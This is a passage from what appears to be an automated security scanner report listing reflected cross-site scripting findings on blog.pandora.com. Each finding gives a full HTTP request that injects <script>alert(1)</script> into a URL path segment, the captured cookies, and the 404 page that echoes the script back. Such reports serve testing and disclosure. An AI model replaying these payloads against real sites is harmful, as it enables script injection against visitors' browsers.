Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p>
...[SNIP]...

1.45. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p>
...[SNIP]...

1.46. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p>
...[SNIP]...

1.47. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p>
...[SNIP]...

1.48. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p>
...[SNIP]...

1.49. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p>
...[SNIP]...

1.50. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p>
...[SNIP]...

1.51. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p>
...[SNIP]...

1.52. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p>
...[SNIP]...

1.53. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p>
...[SNIP]...

1.54. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p>
...[SNIP]...

1.55. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p>
...[SNIP]...

1.56. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p>
...[SNIP]...

1.57. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p>
...[SNIP]...

1.58. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p>
...[SNIP]...

1.59. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p>
...[SNIP]...

1.60. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p>
...[SNIP]...

1.61. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
